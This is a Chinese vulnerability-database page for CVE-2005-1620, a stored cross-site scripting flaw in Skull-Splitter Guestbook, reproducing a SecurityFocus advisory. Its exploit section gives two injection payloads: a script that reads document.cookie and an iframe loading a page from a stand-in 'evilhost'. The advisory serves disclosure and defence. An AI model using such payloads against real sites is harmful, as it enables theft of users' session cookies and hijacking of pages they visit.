Skull-Splitter Guestbook 跨站脚本攻击(XSS)漏洞

Skull-Splitter Guestbook 跨站脚本攻击(XSS)漏洞

漏洞ID 1108784 漏洞类型 跨站脚本
发布时间 2005-05-14 更新时间 2005-10-20
图片[1]-Skull-Splitter Guestbook 跨站脚本攻击(XSS)漏洞-安全小百科CVE编号 CVE-2005-1620
图片[2]-Skull-Splitter Guestbook 跨站脚本攻击(XSS)漏洞-安全小百科CNNVD-ID CNNVD-200505-1050
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/25662
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1050
|漏洞详情
Skull-SplitterGuestbook1.0、2.0和2.2版本中存在跨站脚本攻击(XSS)漏洞,远程攻击者可以通过一个消息的(1)标题或(2)内容来注入任意Web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/13632/info

Skull-Splitter Guestbook is prone to multiple HTML injection vulnerabilities. It is possible to inject HTML and script code into the title and content of posted messages.

The attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user, other attacks are also possible. A victim user who views the vulnerable sections of the site would have the attacker-supplied HTML and script code execute in the security context of the affected site.

Skull-Splitter Guestbook versions 1.0, 2.0, and 2.2 have been reported to be vulnerable, however, other versions may be affected as well. 

1. Type in the title or content of msg

<script>alert(document.cookie)</script>

Type in the title or content of msg

2. <iframe src=http://evilhost/evil.php>
|参考资料

来源:BUGTRAQ
名称:20050514Skull-Splitter’sGuestbookMultipleXXS/HTMLinjection
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111609838307070&w;=2

相关推荐: Dopewars User-Supplied High Score File Disclosure/Overwrite Vulnerability

Dopewars User-Supplied High Score File Disclosure/Overwrite Vulnerability 漏洞ID 1101836 漏洞类型 Design Error 发布时间 2002-06-26 更新时间 2002…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享